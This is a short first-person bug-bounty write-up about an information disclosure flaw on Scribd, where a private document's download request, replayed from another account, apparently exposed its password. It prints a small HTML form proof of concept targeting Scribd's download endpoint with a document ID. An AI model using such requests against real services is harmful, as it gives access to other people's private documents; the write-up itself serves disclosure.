How i Found Information Disclosure on Scribd.com

hi, this is my first write up on medium.com.
11 days ago i found a vulnerability on scribd.com when i finding an answer of my homework ( I was lazy at that time).

then I made a document and made the document private

In my heart I thought that the download button made me curious, so I decided to intercept before pressing the download button. and I found a Request with the POST method in the url: https://www.scribd.com/document_downloads/request_document_for_download

Then I will make a document and give a password (make private) the document and try to get access from another account. After that I created a new account and made a CSRF whose contents were more or less like this:

<html>

<title> Scribd VUlnerability </ title>

<body>

<form action = “https://www.scribd.com/document_downloads/request_document_for_download" method = “POST”>

<input type = “hidden” name = “id” value = “(ID FILE)” />

<input type = “submit” value = “Submit request” />

</ form>

</ body>

</ html>.

and try to do pentesting.

Bingo! after that I managed to get the password to see the private document. After that I asked whether there was a bug bounty program or not to the IT security scribd. after 11 days (When I wrote this) I immediately reported this bug to the Scribd team so that it could be fixed.

Full Video PoC on my Blog :
https://raflipasya19.blogspot.co.id
My Youtube Channel : 
T-GOX Channel

Status:

  • 19 November 2018 16:59 PM = Reported To Scribd Security Team
  • 20 November 2018 01:58 AM = Their team Review my report
  • No response after 4 Days, so i decided to Write Up this issue